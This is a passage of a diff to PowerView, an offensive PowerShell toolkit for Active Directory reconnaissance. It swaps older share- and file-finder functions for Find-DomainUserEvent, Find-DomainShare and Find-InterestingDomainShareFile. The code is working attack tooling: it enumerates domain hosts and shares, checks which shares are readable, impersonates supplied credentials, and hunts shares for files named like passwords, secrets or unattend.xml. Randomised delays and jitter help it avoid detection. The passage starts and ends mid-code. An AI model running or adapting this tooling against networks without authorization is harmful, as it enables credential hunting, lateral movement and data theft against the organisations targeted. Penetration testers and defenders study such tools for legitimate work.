$UserSearchBase } + if ($PSBoundParameters['UserAdminCount']) { $UserSearcherArguments['AdminCount'] = $UserAdminCount } + if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential } + + if ($PSBoundParameters['UserIdentity'] -or $PSBoundParameters['UserLDAPFilter'] -or $PSBoundParameters['UserSearchBase'] -or $PSBoundParameters['UserAdminCount']) { + $TargetUsers = Get-DomainUser @UserSearcherArguments | Select-Object -ExpandProperty samaccountname + } + elseif ($PSBoundParameters['UserGroupIdentity'] -or (-not $PSBoundParameters['Filter'])) { + # otherwise we're querying a specific group + $GroupSearcherArguments = @{ + 'Identity' = $UserGroupIdentity + 'Recurse' = $True + } + Write-Verbose "UserGroupIdentity: $UserGroupIdentity" + if ($PSBoundParameters['UserDomain']) { $GroupSearcherArguments['Domain'] = $UserDomain } + if ($PSBoundParameters['UserSearchBase']) { $GroupSearcherArguments['SearchBase'] = $UserSearchBase } + if ($PSBoundParameters['Server']) { $GroupSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $GroupSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $GroupSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $GroupSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $GroupSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $GroupSearcherArguments['Credential'] = $Credential } + $TargetUsers = Get-DomainGroupMember @GroupSearcherArguments | Select-Object -ExpandProperty MemberName + } + + # build the set of computers to enumerate + if ($PSBoundParameters['ComputerName']) { + $TargetComputers = $ComputerName } - if ($ExcludeIPC) { - $ExcludedShares = $ExcludedShares + "IPC$" - } - if ($ExcludeStandard) { - $ExcludedShares = @('', "ADMIN$", "IPC$", "C$", "PRINT$") + else { + # if not -ComputerName is passed, query the current (or target) domain for domain controllers + $DCSearcherArguments = @{ + 'LDAP' = $True + } + if ($PSBoundParameters['Domain']) { $DCSearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $DCSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['Credential']) { $DCSearcherArguments['Credential'] = $Credential } + Write-Verbose "[Find-DomainUserEvent] Querying for domain controllers in domain: $Domain" + $TargetComputers = Get-DomainController @DCSearcherArguments | Select-Object -ExpandProperty dnshostname } - - # if we're using a host file list, read the targets in and add them to the target list - if($ComputerFile) { - $ComputerName = Get-Content -Path $ComputerFile + if ($TargetComputers -and ($TargetComputers -isnot [System.Array])) { + $TargetComputers = @(,$TargetComputers) } - - if(!$ComputerName) { - [array]$ComputerName = @() - - if($Domain) { - $TargetDomains = @($Domain) - } - elseif($SearchForest) { - # get ALL the domains in the forest to search - $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name } - } - else { - # use the local domain - $TargetDomains = @( (Get-NetDomain).name ) - } - - ForEach ($Domain in $TargetDomains) { - Write-Verbose "[*] Querying domain $Domain for hosts" - $ComputerName += Get-NetComputer -Domain $Domain -DomainController $DomainController -Filter $ComputerFilter -ADSpath $ComputerADSpath - } - - # remove any null target hosts, uniquify the list and shuffle it - $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random } - if($($ComputerName.count) -eq 0) { - throw "No hosts found!" - } + Write-Verbose "[Find-DomainUserEvent] TargetComputers length: $($TargetComputers.Length)" + Write-Verbose "[Find-DomainUserEvent] TargetComputers $TargetComputers" + if ($TargetComputers.Length -eq 0) { + throw '[Find-DomainUserEvent] No hosts found to enumerate' } - # script block that enumerates a server + # the host enumeration block we're using to enumerate all servers $HostEnumBlock = { - param($ComputerName, $Ping, $CheckShareAccess, $ExcludedShares, $CheckAdmin) - - # optionally check if the server is up first - $Up = $True - if($Ping) { - $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName - } - if($Up) { - # get the shares for this host and check what we find - $Shares = Get-NetShare -ComputerName $ComputerName - ForEach ($Share in $Shares) { - Write-Verbose "[*] Server share: $Share" - $NetName = $Share.shi1_netname - $Remark = $Share.shi1_remark - $Path = '\\'+$ComputerName+'\'+$NetName - - # make sure we get a real share name back - if (($NetName) -and ($NetName.trim() -ne '')) { - # if we're just checking for access to ADMIN$ - if($CheckAdmin) { - if($NetName.ToUpper() -eq "ADMIN$") { - try { - $Null = [IO.Directory]::GetFiles($Path) - "\\$ComputerName\$NetName `t- $Remark" - } - catch { - Write-Verbose "Error accessing path $Path : $_" + Param($ComputerName, $StartTime, $EndTime, $MaxEvents, $TargetUsers, $Filter, $Credential) + + ForEach ($TargetComputer in $ComputerName) { + $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer + if ($Up) { + $DomainUserEventArgs = @{ + 'ComputerName' = $TargetComputer + } + if ($StartTime) { $DomainUserEventArgs['StartTime'] = $StartTime } + if ($EndTime) { $DomainUserEventArgs['EndTime'] = $EndTime } + if ($MaxEvents) { $DomainUserEventArgs['MaxEvents'] = $MaxEvents } + if ($Credential) { $DomainUserEventArgs['Credential'] = $Credential } + if ($Filter -or $TargetUsers) { + if ($TargetUsers) { + Get-DomainUserEvent @DomainUserEventArgs | Where-Object {$TargetUsers -contains $_.TargetUserName} + } + else { + $Operator = 'or' + $Filter.Keys | ForEach-Object { + if (($_ -eq 'Op') -or ($_ -eq 'Operator') -or ($_ -eq 'Operation')) { + if (($Filter[$_] -match '&') -or ($Filter[$_] -eq 'and')) { + $Operator = 'and' + } } } - } - # skip this share if it's in the exclude list - elseif ($ExcludedShares -NotContains $NetName.ToUpper()) { - # see if we want to check access to this share - if($CheckShareAccess) { - # check if the user has access to this path - try { - $Null = [IO.Directory]::GetFiles($Path) - "\\$ComputerName\$NetName `t- $Remark" + $Keys = $Filter.Keys | Where-Object {($_ -ne 'Op') -and ($_ -ne 'Operator') -and ($_ -ne 'Operation')} + Get-DomainUserEvent @DomainUserEventArgs | ForEach-Object { + if ($Operator -eq 'or') { + ForEach ($Key in $Keys) { + if ($_."$Key" -match $Filter[$Key]) { + $_ + } + } } - catch { - Write-Verbose "Error accessing path $Path : $_" + else { + # and all clauses + ForEach ($Key in $Keys) { + if ($_."$Key" -notmatch $Filter[$Key]) { + break + } + $_ + } } } - else { - "\\$ComputerName\$NetName `t- $Remark" - } } } + else { + Get-DomainUserEvent @DomainUserEventArgs + } } } } - } - process { - - if($Threads) { - Write-Verbose "Using threading with threads = $Threads" - - # if we're using threading, kick off the script block with Invoke-ThreadedFunction - $ScriptParams = @{ - 'Ping' = $(-not $NoPing) - 'CheckShareAccess' = $CheckShareAccess - 'ExcludedShares' = $ExcludedShares - 'CheckAdmin' = $CheckAdmin - } - - # kick off the threaded script block + arguments - Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads - } - - else { - if(-not $NoPing -and ($ComputerName.count -ne 1)) { - # ping all hosts in parallel - $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}} - $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100 - } + PROCESS { + # only ignore threading if -Delay is passed + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { - Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)" + Write-Verbose "[Find-DomainUserEvent] Total number of hosts: $($TargetComputers.count)" + Write-Verbose "[Find-DomainUserEvent] Delay: $Delay, Jitter: $Jitter" $Counter = 0 + $RandNo = New-Object System.Random - ForEach ($Computer in $ComputerName) { - + ForEach ($TargetComputer in $TargetComputers) { $Counter = $Counter + 1 # sleep for our semi-randomized interval Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) - Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))" - Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $Computer, $False, $CheckShareAccess, $ExcludedShares, $CheckAdmin + Write-Verbose "[Find-DomainUserEvent] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))" + $Result = Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $StartTime, $EndTime, $MaxEvents, $TargetUsers, $Filter, $Credential + $Result + + if ($Result -and $StopOnSuccess) { + Write-Verbose "[Find-DomainUserEvent] Target user found, returning early" + return + } + } + } + else { + Write-Verbose "[Find-DomainUserEvent] Using threading with threads: $Threads" + + # if we're using threading, kick off the script block with New-ThreadedFunction + $ScriptParams = @{ + 'StartTime' = $StartTime + 'EndTime' = $EndTime + 'MaxEvents' = $MaxEvents + 'TargetUsers' = $TargetUsers + 'Filter' = $Filter + 'Credential' = $Credential } + + # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params + New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads } - } } -function Invoke-FileFinder { +function Find-DomainShare { <# - .SYNOPSIS - - Finds sensitive files on the domain. - - Author: @harmj0y - License: BSD 3-Clause - - .DESCRIPTION - - This function finds the local domain name for a host using Get-NetDomain, - queries the domain for all active machines with Get-NetComputer, grabs - the readable shares for each server, and recursively searches every - share for files with specific keywords in the name. - If a share list is passed, EVERY share is enumerated regardless of - other options. - - .PARAMETER ComputerName - - Host array to enumerate, passable on the pipeline. +.SYNOPSIS - .PARAMETER ComputerFile +Searches for computer shares on the domain. If -CheckShareAccess is passed, +then only shares the current user has read access to are returned. - File of hostnames/IPs to search. +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, New-ThreadedFunction - .PARAMETER ComputerFilter +.DESCRIPTION - Host filter name to query AD for, wildcards accepted. +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and enumerates the available shares for each +machine with Get-NetShare. If -CheckShareAccess is passed, then +[IO.Directory]::GetFiles() is used to check if the current user has read +access to the given share. If -Credential is passed, then +Invoke-UserImpersonation is used to impersonate the specified user before +enumeration, reverting after with Invoke-RevertToSelf. - .PARAMETER ComputerADSpath +.PARAMETER ComputerName - The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local" - Useful for OU queries. +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. - .PARAMETER ShareList +.PARAMETER ComputerDomain - List if \\HOST\shares to search through. +Specifies the domain to query for computers, defaults to the current domain. - .PARAMETER Terms +.PARAMETER ComputerLDAPFilter - Terms to search for. +Specifies an LDAP query string that is used to search for computer objects. - .PARAMETER OfficeDocs +.PARAMETER ComputerSearchBase - Switch. Search for office documents (*.doc*, *.xls*, *.ppt*) +Specifies the LDAP source to search through for computers, +e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries. - .PARAMETER FreshEXEs +.PARAMETER ComputerOperatingSystem - Switch. Find .EXEs accessed within the last week. +Search computers with a specific operating system, wildcards accepted. - .PARAMETER LastAccessTime +.PARAMETER ComputerServicePack - Only return files with a LastAccessTime greater than this date value. +Search computers with a specific service pack, wildcards accepted. - .PARAMETER LastWriteTime +.PARAMETER ComputerSiteName - Only return files with a LastWriteTime greater than this date value. +Search computers in the specific AD Site name, wildcards accepted. - .PARAMETER CreationTime +.PARAMETER CheckShareAccess - Only return files with a CreationDate greater than this date value. +Switch. Only display found shares that the local user has access to. - .PARAMETER IncludeC +.PARAMETER Server - Switch. Include any C$ shares in recursive searching (default ignore). +Specifies an Active Directory server (domain controller) to bind to. - .PARAMETER IncludeAdmin +.PARAMETER SearchScope - Switch. Include any ADMIN$ shares in recursive searching (default ignore). +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). - .PARAMETER ExcludeFolders +.PARAMETER ResultPageSize - Switch. Exclude folders from the search results. +Specifies the PageSize to set for the LDAP searcher object. - .PARAMETER ExcludeHidden +.PARAMETER ServerTimeLimit - Switch. Exclude hidden files and folders from the search results. +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. - .PARAMETER CheckWriteAccess +.PARAMETER Tombstone - Switch. Only returns files the current user has write access to. +Switch. Specifies that the searcher should also return deleted/tombstoned objects. - .PARAMETER OutFile +.PARAMETER Credential - Output results to a specified csv output file. +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain and target systems. - .PARAMETER NoClobber +.PARAMETER Delay - Switch. Don't overwrite any existing output file. +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. - .PARAMETER NoPing +.PARAMETER Jitter - Switch. Don't ping each host to ensure it's up before enumerating. +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 - .PARAMETER Delay +.PARAMETER Threads - Delay between enumerating hosts, defaults to 0 +The number of threads to use for user searching, defaults to 20. - .PARAMETER Jitter +.EXAMPLE - Jitter for the host delay, defaults to +/- 0.3 +Find-DomainShare - .PARAMETER Domain +Find all domain shares in the current domain. - Domain to query for machines, defaults to the current domain. +.EXAMPLE - .PARAMETER DomainController +Find-DomainShare -CheckShareAccess - Domain controller to reflect LDAP queries through. +Find all domain shares in the current domain that the current user has +read access to. - .PARAMETER SearchForest +.EXAMPLE - Search all domains in the forest for target users instead of just - a single domain. +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-DomainShare -Domain testlab.local -Credential $Cred - .PARAMETER SearchSYSVOL +Searches for domain shares in the testlab.local domain using the specified alternate credentials. - Switch. Search for login scripts on the SYSVOL of the primary DCs for each specified domain. - - .PARAMETER Threads - - The maximum concurrent threads to execute. - - .PARAMETER UsePSDrive - - Switch. Mount target remote path with temporary PSDrives. - - .EXAMPLE - - PS C:\> Invoke-FileFinder - - Find readable files on the domain with 'pass', 'sensitive', - 'secret', 'admin', 'login', or 'unattend*.xml' in the name, - - .EXAMPLE - - PS C:\> Invoke-FileFinder -Domain testing - - Find readable files on the 'testing' domain with 'pass', 'sensitive', - 'secret', 'admin', 'login', or 'unattend*.xml' in the name, - - .EXAMPLE - - PS C:\> Invoke-FileFinder -IncludeC - - Find readable files on the domain with 'pass', 'sensitive', - 'secret', 'admin', 'login' or 'unattend*.xml' in the name, - including C$ shares. - - .EXAMPLE - - PS C:\> Invoke-FileFinder -ShareList shares.txt -Terms accounts,ssn -OutFile out.csv - - Enumerate a specified share list for files with 'accounts' or - 'ssn' in the name, and write everything to "out.csv" - - .LINK - http://www.harmj0y.net/blog/redteaming/file-server-triage-on-red-team-engagements/ +.OUTPUTS +PowerView.ShareInfo #> - [CmdletBinding()] - param( - [Parameter(Position=0,ValueFromPipeline=$True)] - [Alias('Hosts')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.ShareInfo')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DNSHostName')] [String[]] $ComputerName, - [ValidateScript({Test-Path -Path $_ })] - [Alias('HostList')] - [String] - $ComputerFile, - - [String] - $ComputerFilter, - + [ValidateNotNullOrEmpty()] + [Alias('Domain')] [String] - $ComputerADSpath, + $ComputerDomain, - [ValidateScript({Test-Path -Path $_ })] + [ValidateNotNullOrEmpty()] [String] - $ShareList, - - [Switch] - $OfficeDocs, - - [Switch] - $FreshEXEs, - - [Alias('Terms')] - [String[]] - $SearchTerms, + $ComputerLDAPFilter, - [ValidateScript({Test-Path -Path $_ })] + [ValidateNotNullOrEmpty()] [String] - $TermList, + $ComputerSearchBase, + [ValidateNotNullOrEmpty()] + [Alias('OperatingSystem')] [String] - $LastAccessTime, + $ComputerOperatingSystem, + [ValidateNotNullOrEmpty()] + [Alias('ServicePack')] [String] - $LastWriteTime, + $ComputerServicePack, + [ValidateNotNullOrEmpty()] + [Alias('SiteName')] [String] - $CreationTime, + $ComputerSiteName, + [Alias('CheckAccess')] [Switch] - $IncludeC, - - [Switch] - $IncludeAdmin, + $CheckShareAccess, - [Switch] - $ExcludeFolders, + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, - [Switch] - $ExcludeHidden, + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', - [Switch] - $CheckWriteAccess, + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, - [String] - $OutFile, + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, [Switch] - $NoClobber, + $Tombstone, - [Switch] - $NoPing, + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, - [UInt32] + [ValidateRange(1, 10000)] + [Int] $Delay = 0, + [ValidateRange(0.0, 1.0)] [Double] $Jitter = .3, - [String] - $Domain, - - [String] - $DomainController, - - [Switch] - $SearchForest, - - [Switch] - $SearchSYSVOL, - - [ValidateRange(1,100)] [Int] - $Threads, - - [Switch] - $UsePSDrive + [ValidateRange(1, 100)] + $Threads = 20 ) - begin { - if ($PSBoundParameters['Debug']) { - $DebugPreference = 'Continue' - } - - # random object for delay - $RandNo = New-Object System.Random - - Write-Verbose "[*] Running Invoke-FileFinder with delay of $Delay" - - $Shares = @() - - # figure out the shares we want to ignore - [String[]] $ExcludedShares = @("C$", "ADMIN$") - - # see if we're specifically including any of the normally excluded sets - if ($IncludeC) { - if ($IncludeAdmin) { - $ExcludedShares = @() - } - else { - $ExcludedShares = @("ADMIN$") - } - } - - if ($IncludeAdmin) { - if ($IncludeC) { - $ExcludedShares = @() - } - else { - $ExcludedShares = @("C$") - } - } - - # delete any existing output file if it already exists - if(!$NoClobber) { - if ($OutFile -and (Test-Path -Path $OutFile)) { Remove-Item -Path $OutFile } - } + BEGIN { - # if there's a set of terms specified to search for - if ($TermList) { - ForEach ($Term in Get-Content -Path $TermList) { - if (($Term -ne $Null) -and ($Term.trim() -ne '')) { - $SearchTerms += $Term - } - } + $ComputerSearcherArguments = @{ + 'Properties' = 'dnshostname' } + if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain } + if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter } + if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase } + if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained } + if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem } + if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack } + if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName } + if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential } - # if we're hard-passed a set of shares - if($ShareList) { - ForEach ($Item in Get-Content -Path $ShareList) { - if (($Item -ne $Null) -and ($Item.trim() -ne '')) { - # exclude any "[tab]- commants", i.e. the output from Invoke-ShareFinder - $Share = $Item.Split("`t")[0] - $Shares += $Share - } - } + if ($PSBoundParameters['ComputerName']) { + $TargetComputers = $ComputerName } else { - # if we're using a host file list, read the targets in and add them to the target list - if($ComputerFile) { - $ComputerName = Get-Content -Path $ComputerFile - } - - if(!$ComputerName) { - - if($Domain) { - $TargetDomains = @($Domain) - } - elseif($SearchForest) { - # get ALL the domains in the forest to search - $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name } - } - else { - # use the local domain - $TargetDomains = @( (Get-NetDomain).name ) - } - - if($SearchSYSVOL) { - ForEach ($Domain in $TargetDomains) { - $DCSearchPath = "\\$Domain\SYSVOL\" - Write-Verbose "[*] Adding share search path $DCSearchPath" - $Shares += $DCSearchPath - } - if(!$SearchTerms) { - # search for interesting scripts on SYSVOL - $SearchTerms = @('.vbs', '.bat', '.ps1') - } - } - else { - [array]$ComputerName = @() - - ForEach ($Domain in $TargetDomains) { - Write-Verbose "[*] Querying domain $Domain for hosts" - $ComputerName += Get-NetComputer -Filter $ComputerFilter -ADSpath $ComputerADSpath -Domain $Domain -DomainController $DomainController - } - - # remove any null target hosts, uniquify the list and shuffle it - $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random } - if($($ComputerName.Count) -eq 0) { - throw "No hosts found!" - } - } - } + Write-Verbose '[Find-DomainShare] Querying computers in the domain' + $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname + } + Write-Verbose "[Find-DomainShare] TargetComputers length: $($TargetComputers.Length)" + if ($TargetComputers.Length -eq 0) { + throw '[Find-DomainShare] No hosts found to enumerate' } - # script block that enumerates shares and files on a server + # the host enumeration block we're using to enumerate all servers $HostEnumBlock = { - param($ComputerName, $Ping, $ExcludedShares, $SearchTerms, $ExcludeFolders, $OfficeDocs, $ExcludeHidden, $FreshEXEs, $CheckWriteAccess, $OutFile, $UsePSDrive) + Param($ComputerName, $CheckShareAccess, $TokenHandle) - Write-Verbose "ComputerName: $ComputerName" - Write-Verbose "ExcludedShares: $ExcludedShares" - $SearchShares = @() - - if($ComputerName.StartsWith("\\")) { - # if a share is passed as the server - $SearchShares += $ComputerName + if ($TokenHandle) { + # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation + $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet } - else { - # if we're enumerating the shares on the target server first - $Up = $True - if($Ping) { - $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName - } - if($Up) { - # get the shares for this host and display what we find - $Shares = Get-NetShare -ComputerName $ComputerName - ForEach ($Share in $Shares) { - - $NetName = $Share.shi1_netname - $Path = '\\'+$ComputerName+'\'+$NetName - # make sure we get a real share name back - if (($NetName) -and ($NetName.trim() -ne '')) { + ForEach ($TargetComputer in $ComputerName) { + $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer + if ($Up) { + # get the shares for this host and check what we find + $Shares = Get-NetShare -ComputerName $TargetComputer + ForEach ($Share in $Shares) { + $ShareName = $Share.Name + # $Remark = $Share.Remark + $Path = '\\'+$TargetComputer+'\'+$ShareName - # skip this share if it's in the exclude list - if ($ExcludedShares -NotContains $NetName.ToUpper()) { + if (($ShareName) -and ($ShareName.trim() -ne '')) { + # see if we want to check access to this share + if ($CheckShareAccess) { # check if the user has access to this path try { $Null = [IO.Directory]::GetFiles($Path) - $SearchShares += $Path + $Share } catch { - Write-Verbose "[!] No access to $Path" + Write-Verbose "Error accessing share path $Path : $_" } } + else { + $Share + } } } - } - } - - ForEach($Share in $SearchShares) { - $SearchArgs = @{ - 'Path' = $Share - 'SearchTerms' = $SearchTerms - 'OfficeDocs' = $OfficeDocs - 'FreshEXEs' = $FreshEXEs - 'LastAccessTime' = $LastAccessTime - 'LastWriteTime' = $LastWriteTime - 'CreationTime' = $CreationTime - 'ExcludeFolders' = $ExcludeFolders - 'ExcludeHidden' = $ExcludeHidden - 'CheckWriteAccess' = $CheckWriteAccess - 'OutFile' = $OutFile - 'UsePSDrive' = $UsePSDrive - } - - Find-InterestingFile @SearchArgs - } - } - } - - process { - - if($Threads) { - Write-Verbose "Using threading with threads = $Threads" + } + } - # if we're using threading, kick off the script block with Invoke-ThreadedFunction - $ScriptParams = @{ - 'Ping' = $(-not $NoPing) - 'ExcludedShares' = $ExcludedShares - 'SearchTerms' = $SearchTerms - 'ExcludeFolders' = $ExcludeFolders - 'OfficeDocs' = $OfficeDocs - 'ExcludeHidden' = $ExcludeHidden - 'FreshEXEs' = $FreshEXEs - 'CheckWriteAccess' = $CheckWriteAccess - 'OutFile' = $OutFile - 'UsePSDrive' = $UsePSDrive + if ($TokenHandle) { + Invoke-RevertToSelf } + } - # kick off the threaded script block + arguments - if($Shares) { - # pass the shares as the hosts so the threaded function code doesn't have to be hacked up - Invoke-ThreadedFunction -ComputerName $Shares -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads + $LogonToken = $Null + if ($PSBoundParameters['Credential']) { + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential } else { - Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads + $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet } } + } - else { - if($Shares){ - $ComputerName = $Shares - } - elseif(-not $NoPing -and ($ComputerName.count -gt 1)) { - # ping all hosts in parallel - $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}} - $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100 - } + PROCESS { + # only ignore threading if -Delay is passed + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { - Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)" + Write-Verbose "[Find-DomainShare] Total number of hosts: $($TargetComputers.count)" + Write-Verbose "[Find-DomainShare] Delay: $Delay, Jitter: $Jitter" $Counter = 0 + $RandNo = New-Object System.Random - $ComputerName | Where-Object {$_} | ForEach-Object { - Write-Verbose "Computer: $_" + ForEach ($TargetComputer in $TargetComputers) { $Counter = $Counter + 1 # sleep for our semi-randomized interval Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) - Write-Verbose "[*] Enumerating server $_ ($Counter of $($ComputerName.count))" + Write-Verbose "[Find-DomainShare] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))" + Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $CheckShareAccess, $LogonToken + } + } + else { + Write-Verbose "[Find-DomainShare] Using threading with threads: $Threads" - Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $_, $False, $ExcludedShares, $SearchTerms, $ExcludeFolders, $OfficeDocs, $ExcludeHidden, $FreshEXEs, $CheckWriteAccess, $OutFile, $UsePSDrive + # if we're using threading, kick off the script block with New-ThreadedFunction + $ScriptParams = @{ + 'CheckShareAccess' = $CheckShareAccess + 'TokenHandle' = $LogonToken } + + # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params + New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken } } } -function Find-LocalAdminAccess { +function Find-InterestingDomainShareFile { <# - .SYNOPSIS +.SYNOPSIS - Finds machines on the local domain where the current user has - local administrator access. Uses multithreading to - speed up enumeration. +Searches for files matching specific criteria on readable shares +in the domain. - Author: @harmj0y - License: BSD 3-Clause +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, Find-InterestingFile, New-ThreadedFunction - .DESCRIPTION +.DESCRIPTION - This function finds the local domain name for a host using Get-NetDomain, - queries the domain for all active machines with Get-NetComputer, then for - each server it checks if the current user has local administrator - access using Invoke-CheckLocalAdminAccess. +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and enumerates the available shares for each +machine with Get-NetShare. It will then use Find-InterestingFile on each +readhable share, searching for files marching specific criteria. If -Credential +is passed, then Invoke-UserImpersonation is used to impersonate the specified +user before enumeration, reverting after with Invoke-RevertToSelf. - Idea stolen from the local_admin_search_enum post module in - Metasploit written by: - 'Brandon McCann "zeknox" ' - 'Thomas McCarthy "smilingraccoon" ' - 'Royce Davis "r3dy" ' +.PARAMETER ComputerName - .PARAMETER ComputerName +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. - Host array to enumerate, passable on the pipeline. +.PARAMETER ComputerDomain - .PARAMETER ComputerFile +Specifies the domain to query for computers, defaults to the current domain. - File of hostnames/IPs to search. +.PARAMETER ComputerLDAPFilter - .PARAMETER ComputerFilter +Specifies an LDAP query string that is used to search for computer objects. - Host filter name to query AD for, wildcards accepted. +.PARAMETER ComputerSearchBase - .PARAMETER ComputerADSpath +Specifies the LDAP source to search through for computers, +e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries. - The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local" - Useful for OU queries. +.PARAMETER ComputerOperatingSystem - .PARAMETER NoPing +Search computers with a specific operating system, 